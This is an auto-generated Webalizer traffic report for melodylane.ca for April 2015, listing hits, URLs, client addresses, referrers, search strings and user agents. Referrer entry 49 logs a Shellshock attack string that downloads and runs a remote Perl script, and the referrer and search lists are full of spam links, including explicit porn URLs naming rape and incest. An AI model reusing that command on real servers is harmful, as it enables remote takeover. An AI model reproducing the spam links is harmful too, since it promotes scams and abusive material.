Usage Statistics for melodylane.ca

Summary Period: April 2015
Generated 01-May-2015 03:45 EDT

[Daily Statistics] [URLs] [Entry] [Exit] [Sites] [Referrers] [Search] [Agents] [Countries]

Monthly Statistics for April 2015
Total Hits 73680
Total Files 66718
Total Pages 65665
Total Visits 10792
Total KBytes 4532561
Total Unique Sites 2629
Total Unique URLs 664
Total Unique Referrers 6550
Total Unique User Agents 939
. Avg Max
Hits per Hour 102 521
Hits per Day 2456 3953
Files per Day 2223 3741
Pages per Day 2188 3643
Sites per Day 87 232
Visits per Day 359 468
KBytes per Day 151085 277298
Hits by Response Code
Code 200 - OK 90.55% 66718
Code 206 - Partial Content 2.02% 1486
Code 301 - Moved Permanently 0.02% 15
Code 302 - Found 0.18% 133
Code 304 - Not Modified 1.21% 888
Code 400 - Bad Request 1.05% 776
Code 403 - Forbidden 1.07% 790
Code 404 - Not Found 3.53% 2604
Code 500 - Internal Server Error 0.36% 266
Code 505 - HTTP Version Not Supported 0.01% 4

Daily usage for April 2015

Daily Statistics for April 2015
Day Hits Files Pages Visits Sites KBytes
1 2220 3.01% 2007 3.01% 2041 3.11% 346 3.21% 153 5.82% 92739 2.05%
2 2226 3.02% 1871 2.80% 1925 2.93% 402 3.72% 155 5.90% 112399 2.48%
3 2237 3.04% 2085 3.13% 2099 3.20% 347 3.22% 170 6.47% 91161 2.01%
4 2282 3.10% 2180 3.27% 2023 3.08% 353 3.27% 142 5.40% 136396 3.01%
5 2023 2.75% 1605 2.41% 1851 2.82% 321 2.97% 150 5.71% 112864 2.49%
6 1645 2.23% 1421 2.13% 1295 1.97% 351 3.25% 221 8.41% 63591 1.40%
7 1340 1.82% 1183 1.77% 996 1.52% 372 3.45% 190 7.23% 85145 1.88%
8 2105 2.86% 1769 2.65% 1729 2.63% 345 3.20% 192 7.30% 53806 1.19%
9 2078 2.82% 1728 2.59% 1827 2.78% 376 3.48% 204 7.76% 77870 1.72%
10 1811 2.46% 1511 2.26% 1644 2.50% 353 3.27% 203 7.72% 105528 2.33%
11 3953 5.37% 3741 5.61% 3577 5.45% 334 3.09% 164 6.24% 276926 6.11%
12 3705 5.03% 3512 5.26% 3515 5.35% 412 3.82% 232 8.82% 277298 6.12%
13 2235 3.03% 2050 3.07% 2005 3.05% 427 3.96% 217 8.25% 159489 3.52%
14 1395 1.89% 1180 1.77% 1172 1.78% 342 3.17% 190 7.23% 71049 1.57%
15 1090 1.48% 924 1.38% 994 1.51% 290 2.69% 171 6.50% 82759 1.83%
16 2971 4.03% 2824 4.23% 2668 4.06% 358 3.32% 189 7.19% 234805 5.18%
17 3540 4.80% 3259 4.88% 3208 4.89% 468 4.34% 212 8.06% 221069 4.88%
18 3787 5.14% 3620 5.43% 3643 5.55% 394 3.65% 205 7.80% 255344 5.63%
19 3580 4.86% 3402 5.10% 3422 5.21% 385 3.57% 155 5.90% 269915 5.96%
20 1656 2.25% 1384 2.07% 1462 2.23% 294 2.72% 169 6.43% 82070 1.81%
21 2259 3.07% 2011 3.01% 1968 3.00% 343 3.18% 153 5.82% 130689 2.88%
22 2088 2.83% 1968 2.95% 1924 2.93% 343 3.18% 155 5.90% 177932 3.93%
23 2538 3.44% 2316 3.47% 1644 2.50% 285 2.64% 171 6.50% 128184 2.83%
24 1618 2.20% 1288 1.93% 1352 2.06% 417 3.86% 232 8.82% 83180 1.84%
25 3641 4.94% 3188 4.78% 3295 5.02% 386 3.58% 195 7.42% 220485 4.86%
26 3193 4.33% 3036 4.55% 3034 4.62% 373 3.46% 172 6.54% 229938 5.07%
27 3695 5.01% 3542 5.31% 3526 5.37% 401 3.72% 187 7.11% 274619 6.06%
28 2056 2.79% 1808 2.71% 1775 2.70% 323 2.99% 172 6.54% 131205 2.89%
29 2338 3.17% 2196 3.29% 2099 3.20% 342 3.17% 184 7.00% 124444 2.75%
30 2375 3.22% 2109 3.16% 1952 2.97% 392 3.63% 171 6.50% 169665 3.74%

Top 30 of 664 Total URLs
# Hits KBytes URL
1 17036 23.12% 1607357 35.46% /webalizer/usage_201501.html
2 16681 22.64% 154316 3.40% /webalizer/
3 6432 8.73% 106414 2.35% /
4 5595 7.59% 519991 11.47% /webalizer/usage_201311.html
5 3004 4.08% 277080 6.11% /webalizer/usage_201409.html
6 1439 1.95% 123014 2.71% /webalizer/usage_201504.html
7 1365 1.85% 137020 3.02% /webalizer/usage_201503.html
8 1020 1.38% 90869 2.00% /webalizer/usage_201402.html
9 491 0.67% 45208 1.00% /webalizer/usage_201303.html
10 317 0.43% 23449 0.52% /webalizer/usage_201401.html
11 256 0.35% 12873 0.28% /webalizer/usage_201205.html
12 223 0.30% 475 0.01% /exmplmenu_var.js
13 223 0.30% 1620 0.04% /menu_com.js
14 222 0.30% 21037 0.46% /webalizer/usage_201111.html
15 209 0.28% 3375 0.07% /cdn_dvd_order_form.htm
16 199 0.27% 17817 0.39% /webalizer/usage_201101.html
17 196 0.27% 16198 0.36% /webalizer/usage_201312.html
18 186 0.25% 801 0.02% /~webmail/cgi-bin/openwebmail.pl
19 184 0.25% 16852 0.37% /webalizer/usage_201001.html
20 183 0.25% 111 0.00% /formmail.php
21 173 0.23% 2262 0.05% /songs_from_heart.htm
22 169 0.23% 14904 0.33% /webalizer/usage_201211.html
23 168 0.23% 14434 0.32% /webalizer/usage_200708.html
24 161 0.22% 13252 0.29% /webalizer/usage_201404.html
25 158 0.21% 1957 0.04% /index2.htm
26 155 0.21% 13213 0.29% /webalizer/usage_201502.html
27 148 0.20% 13271 0.29% /webalizer/usage_201204.html
28 148 0.20% 10607 0.23% /webalizer/usage_201407.html
29 146 0.20% 13037 0.29% /webalizer/usage_200912.html
30 140 0.19% 9833 0.22% /webalizer/usage_200709.html

Top 10 of 200 Total Entry Pages
# Hits Visits URL
1 6432 8.73% 3432 32.36% /
2 16681 22.64% 1988 18.74% /webalizer/
3 5595 7.59% 898 8.47% /webalizer/usage_201311.html
4 17036 23.12% 591 5.57% /webalizer/usage_201501.html
5 3004 4.08% 542 5.11% /webalizer/usage_201409.html
6 1439 1.95% 529 4.99% /webalizer/usage_201504.html
7 1365 1.85% 242 2.28% /webalizer/usage_201503.html
8 1020 1.38% 198 1.87% /webalizer/usage_201402.html
9 256 0.35% 132 1.24% /webalizer/usage_201205.html
10 184 0.25% 99 0.93% /webalizer/usage_201001.html

Top 10 of 199 Total Exit Pages
# Hits Visits URL
1 6432 8.73% 3395 32.11% /
2 16681 22.64% 2019 19.09% /webalizer/
3 5595 7.59% 900 8.51% /webalizer/usage_201311.html
4 17036 23.12% 593 5.61% /webalizer/usage_201501.html
5 1439 1.95% 545 5.15% /webalizer/usage_201504.html
6 3004 4.08% 535 5.06% /webalizer/usage_201409.html
7 1365 1.85% 228 2.16% /webalizer/usage_201503.html
8 1020 1.38% 193 1.83% /webalizer/usage_201402.html
9 256 0.35% 130 1.23% /webalizer/usage_201205.html
10 184 0.25% 94 0.89% /webalizer/usage_201001.html

Top 30 of 2629 Total Sites
# Hits Files KBytes Visits Hostname
1 5928 8.05% 5928 8.89% 97055 2.14% 408 3.78% 212.129.33.212
2 4584 6.22% 4584 6.87% 433031 9.55% 90 0.83% 178.137.162.30
3 4360 5.92% 4360 6.53% 411186 9.07% 85 0.79% 178.137.91.75
4 4048 5.49% 4048 6.07% 402603 8.88% 134 1.24% 5.9.58.169
5 3930 5.33% 3930 5.89% 366691 8.09% 876 8.12% 93.79.202.178
6 3635 4.93% 3635 5.45% 343383 7.58% 88 0.82% 46.118.123.156
7 2577 3.50% 2577 3.86% 242520 5.35% 223 2.07% 195.154.215.76
8 2510 3.41% 2510 3.76% 24825 0.55% 8 0.07% 5.9.193.41
9 1840 2.50% 1472 2.21% 9817 0.22% 8 0.07% 88.198.48.46
10 1810 2.46% 1810 2.71% 17908 0.40% 1 0.01% 5.9.189.5
11 1548 2.10% 1548 2.32% 144437 3.19% 10 0.09% 141.101.31.80
12 1090 1.48% 1090 1.63% 10784 0.24% 5 0.05% 77.123.28.56
13 1044 1.42% 1044 1.56% 98520 2.17% 27 0.25% 46.119.114.138
14 1028 1.40% 1028 1.54% 96946 2.14% 67 0.62% 37.115.188.225
15 1009 1.37% 1009 1.51% 41698 0.92% 108 1.00% 176.98.70.163
16 961 1.30% 961 1.44% 0 0.00% 301 2.79% 46.161.41.84
17 928 1.26% 928 1.39% 87664 1.93% 51 0.47% 46.118.119.143
18 721 0.98% 686 1.03% 151178 3.34% 35 0.32% 188.143.232.19
19 684 0.93% 684 1.03% 6764 0.15% 24 0.22% 62.210.139.62
20 665 0.90% 665 1.00% 66734 1.47% 132 1.22% 91.207.6.2
21 629 0.85% 629 0.94% 12901 0.28% 30 0.28% 220.233.154.5
22 612 0.83% 612 0.92% 57813 1.28% 35 0.32% 46.118.122.35
23 603 0.82% 603 0.90% 5965 0.13% 151 1.40% 77.123.242.33
24 586 0.80% 586 0.88% 12019 0.27% 145 1.34% 176.37.114.123
25 580 0.79% 562 0.84% 121274 2.68% 29 0.27% 188.143.232.21
26 508 0.69% 508 0.76% 5026 0.11% 182 1.69% 93.158.212.61
27 476 0.65% 476 0.71% 44966 0.99% 14 0.13% 178.137.80.144
28 474 0.64% 474 0.71% 4689 0.10% 103 0.95% 77.123.240.236
29 418 0.57% 388 0.58% 84044 1.85% 15 0.14% 188.143.232.16
30 411 0.56% 411 0.62% 4065 0.09% 212 1.96% 37.1.208.64

Top 10 of 2629 Total Sites By KBytes
# Hits Files KBytes Visits Hostname
1 4584 6.22% 4584 6.87% 433031 9.55% 90 0.83% 178.137.162.30
2 4360 5.92% 4360 6.53% 411186 9.07% 85 0.79% 178.137.91.75
3 4048 5.49% 4048 6.07% 402603 8.88% 134 1.24% 5.9.58.169
4 3930 5.33% 3930 5.89% 366691 8.09% 876 8.12% 93.79.202.178
5 3635 4.93% 3635 5.45% 343383 7.58% 88 0.82% 46.118.123.156
6 2577 3.50% 2577 3.86% 242520 5.35% 223 2.07% 195.154.215.76
7 721 0.98% 686 1.03% 151178 3.34% 35 0.32% 188.143.232.19
8 1548 2.10% 1548 2.32% 144437 3.19% 10 0.09% 141.101.31.80
9 580 0.79% 562 0.84% 121274 2.68% 29 0.27% 188.143.232.21
10 1044 1.42% 1044 1.56% 98520 2.17% 27 0.25% 46.119.114.138

Top 50 of 6550 Total Referrers
# Hits Referrer
1 14202 19.28% - (Direct Request)
2 1499 2.03% http://melodylane.ca/
3 1460 1.98% http://imp-mebeli.ru/
4 1280 1.74% http://www.melodylane.ca/
5 792 1.07% http://alcoholism.spbdyet.ru
6 792 1.07% http://monasterytea.spbdyet.ru
7 732 0.99% http://www.moykrest.ru/monastyrskij-chaj-ot-diabeta
8 469 0.64% http://bystrye-zajmy.ru/
9 416 0.56% http://chat-ruletka.net/chatroulette-russia
10 392 0.53% http://www.moykrest.ru/bibliya/prorochestvo-i-cerkov.html
11 337 0.46% http://www.gorodservis.ru
12 328 0.45% http://otv24.com
13 319 0.43% http://donstroymebel.com/
14 311 0.42% http://amoxil365.com
15 300 0.41% http://kp-mosk.ru/html/1
16 265 0.36% http://www.prepaid-international-phone-card.com
17 248 0.34% http://www.tiprus.com/
18 244 0.33% http://www.bigzon.com
19 236 0.32% http://hello-moto.com/
20 229 0.31% http://online--pharmacy.tk
21 228 0.31% http://hotflirt.ru
22 226 0.31% http://ladypozitiv.com/
23 224 0.30% http://www.boxfon.ru
24 201 0.27% http://levitra-365.com
25 192 0.26% http://donpozitiv.com/
26 184 0.25% http://cytotec365.com
27 178 0.24% http://xanaxpills.com
28 177 0.24% http://antidepressants.tk
29 172 0.23% http://komunist.ru
30 168 0.23% http://brus-vsem.ru
31 168 0.23% http://chimiver.info
32 168 0.23% http://veloremont.net
33 164 0.22% http://3dprynter.ru/3d-skanery
34 164 0.22% http://doms.com.ua/category/dlya-detskoj
35 164 0.22% http://plej-market-dlya-kompyutera.ru
36 162 0.22% http://vk.com/uprazhneniyasgantelyami
37 160 0.22% http://arbg.ru
38 160 0.22% http://www.herrera.md/index.php/ro/intrebari-frecvente
39 160 0.22% https://chess-samara.ru/play/random.html
40 156 0.21% http://bnn.com.ua/pellety.html
41 156 0.21% http://www.lux-grand.ru/
42 144 0.20% http://online-ruletka.ru/
43 143 0.19% http://www.melodylane.ca/songs_from_heart.htm
44 132 0.18% http://weatheruk.ru/
45 131 0.18% http://direct-paydayloansonline.ml
46 128 0.17% http://buyanessaysonline.com
47 128 0.17% http://sevpanorama.info
48 128 0.17% http://xn--c1aerica1aoz1g.xn--p1ai/
49 126 0.17% () { :; }; wget -qO - http://54.248.244.82/test.pl | perl
50 125 0.17% http://metformin365.tk

Top 50 of 250 Total Search Strings
# Hits Search String
1 4 1.52% http://sadomazosex.ru/lizat-gospazhe-v-naruchnikax
2 3 1.14% http://sadomazosex.ru/porno-smotret-besrlatno-zhopastie
3 3 1.14% http://sadomazosex.ru/skrytyj-kamera-selka-erotika
4 2 0.76% http://pizzastolitsa.ru/klassnoe-kachestvennoe-russkoe-porno
5 2 0.76% http://sadomazosex.ru/iskacht
6 2 0.76% http://sadomazosex.ru/karotki-seks-ruski
7 2 0.76% http://sadomazosex.ru/ozoda-seks
8 2 0.76% http://sadomazosex.ru/pasmatret-cyganskuyu-parnuxu
9 2 0.76% http://sadomazosex.ru/sekis-20
10 1 0.38% georgina rae sing along
11 1 0.38% http://asadv.ru/besplatnoe-porno-i-bez-registracii-s-sobakami
12 1 0.38% http://asadv.ru/lesbeyanki
13 1 0.38% http://b-gs.ru/chuvak-traxnul-dvux-telok-na-stoyanke
14 1 0.38% http://b-gs.ru/snyat-dvux-suchek-dlya-seksa-besplatno
15 1 0.38% http://b7i.ru/telki-obkonchalis-skvirting
16 1 0.38% http://baseclimbing.ru/zhena-u-muzhika-strastnaya-nezdnica
17 1 0.38% http://brunse.ru/manyak-ebet-v-zhopu-bludlivuyu-zhenu-soseda
18 1 0.38% http://carvibor.ru/dve-lesbiyanki-v-saune-s-vibratorom
19 1 0.38% http://carvibor.ru/sestra-s-uprugoj-popkoj-soblaznyaet-brata
20 1 0.38% http://hot-24.ru/negr-zhestoko-traxaet-chyuzhuyu-zhenu-vozl-muzha
21 1 0.38% http://hot-24.ru/skachat-video-kuni-zhene
22 1 0.38% http://kawtahka.tk/a-za-etoj-devushkoj-podglyadyvala-kamera-kogda-ona-brila-kisku
23 1 0.38% http://kawtahka.tk/jayden-jaymes-jayden-vtroem-ubivayut-svobodnoe-vremya
24 1 0.38% http://kawtahka.tk/krasivo-trax-porno
25 1 0.38% http://kawtahka.tk/sama-poshla-na-prirodu-chtoby-xorosho-otmasturbirovat
26 1 0.38% http://likenews24.ru/3dr-gei
27 1 0.38% http://likenews24.ru/analnyj-seks-seks-vtroem-onlajn-porno
28 1 0.38% http://likenews24.ru/ates-i-dochire-selka-skachat-vedeo-bisplatn
29 1 0.38% http://likenews24.ru/bezplatne-porno
30 1 0.38% http://likenews24.ru/bobi-star-otorvalas-na-divane-s-papinym-drugom
31 1 0.38% http://likenews24.ru/bolshie-chleny-v-dejstvii
32 1 0.38% http://likenews24.ru/chernye-golubki-predalis-neistovoj-strasti-v-gostinichnom-nomere
33 1 0.38% http://likenews24.ru/devka-znaet-kak-pravilno-vozbudit-parnya
34 1 0.38% http://likenews24.ru/devushka-nakazyvaet-parnya
35 1 0.38% http://likenews24.ru/devushki-konchayut-na-chlene-podborka
36 1 0.38% http://likenews24.ru/devushku-puskayut-po-krugu-i-spuskayut-ej-na-lico
37 1 0.38% http://likenews24.ru/domashnee-russkoe-porno-video-3g
38 1 0.38% http://likenews24.ru/dve-aziatochki-traxayutsya-na-krovati-vibratorami
39 1 0.38% http://likenews24.ru/dve-telki-v-chulkax-zhestko-traxayutsya-v-podvale-bolshim-fallosom
40 1 0.38% http://likenews24.ru/erotika-mladshij-brat-zhestoko-nasiluet-starshuyu-sestru
41 1 0.38% http://likenews24.ru/fata-porno-skachajt
42 1 0.38% http://likenews24.ru/gei-3gr
43 1 0.38% http://likenews24.ru/goryachaya
44 1 0.38% http://likenews24.ru/igrali-vtroem-s-odnim-parnem
45 1 0.38% http://likenews24.ru/incest-v-derevne-s-rodstvikami
46 1 0.38% http://likenews24.ru/izgolodavshayasya-po-seksu-bryunetochka-podstavlyaet-kopilku-dlya-chlena
47 1 0.38% http://likenews24.ru/iznasilovaniya-dlya-mobilnyx
48 1 0.38% http://likenews24.ru/kazashka-i-negr-karotkie-roliki-skachat-na-telefon
49 1 0.38% http://likenews24.ru/krasivaya-devushka-v-grupovuxe-seks
50 1 0.38% http://likenews24.ru/mamoy-vannoyu-parno-video-bezplatni

Top 15 of 939 Total User Agents
# Hits User Agent
1 3305 4.49% Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2 1849 2.51% Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 OPR/23.0.1522.7
3 1700 2.31% Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
4 1682 2.28% Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.17
5 1608 2.18% Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +https://www.megaindex.ru/?tab=linkAnalyze)
6 1006 1.37% Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 OPR/23.0.1522.7
7 975 1.32% Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
8 951 1.29% Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 YaBrowser/14.7.1916.15705 Saf
9 945 1.28% Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
10 943 1.28% Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
11 940 1.28% Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
12 934 1.27% Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
13 932 1.26% Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 OPR/23.0.1522.77
14 927 1.26% Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
15 925 1.26% Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 YaBrowser/14.7.1916.15705 Saf

Top 1 of 1 Total Countries
# Hits Files KBytes Country
1 73680 100.00% 68204 102.23% 4532561 100.00% Unresolved/Unknown


Generated by Webalizer Version 2.21